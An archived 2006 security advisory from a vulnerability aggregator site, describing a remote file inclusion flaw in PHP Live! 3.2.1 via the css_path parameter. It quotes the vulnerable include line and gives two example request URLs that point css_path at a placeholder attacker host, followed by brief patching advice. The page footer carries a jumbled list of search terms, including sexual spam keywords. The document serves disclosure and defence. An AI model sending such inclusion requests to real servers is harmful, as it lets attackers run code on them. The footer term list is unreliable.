about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability




2006-07-23 PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability
Rated as : High Risk

    Advisory: PHPLive 3.2 Remote Injection Vulnerability
 Release Date: 2006/07/23
       Author: magnific
   Discovered: aneurysm.inc security reserach
         Risk: High
Vendor Status: not contacted | no patch available
  Vendor Site: www.osicodes.com
      Contact: aneurysm_inc[at]hotmail[dot]com
      Version: all

-----------
Overview:

Some variables are not properly sanitized before being used.
Here you will find the variables not properly sanitized:

-----------
Vulnerable code:

help.php /setup/header.php etc..

<? $css_path = ( !isset( $css_path ) ) ? $css_path = "./" :
$css_path ; include_once( $css_path."css/default.php" ) ; ?>

-----------
Execution:

help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker


-----------
Vendor:

At the moment, there are no solutions from the vendor. If you want to
make
sure the code and your PHPLIVE you have to sanitize the variable
$css_path,
in all files affecteds.
Active SAFE_MODE on server, for local security.

---------------------------
aneurysm.inc security reserach
irc.gigachat.net
#aneurysm.inc
---------------------------
securitydot.net - 2006-07-23

Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 18:18:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
pitty 10.4.7 sex poran t78t Ga ada yg Gay boys s Sex Pictur Teenboy apache 1.3 CMS is Fre hasni Sex girl sex prons Shop Cart t638t ip board 2 safari fra t638t www.89.c0m t906t www.56com freesexywa kar20sex grils boob freebsd 6 IndiaSWE needbang.c filmesgrat grils boob Naruto ani ms frontpa Wap sexygi local shel www.Pakist Free sex m xnxx.com sxe inject /search/ex Getjar.com www.aishwa mambo Remo tamil sex apache 2.0 t638t extremem t293t nude sexy www.700xxx bandung la Thirisa ba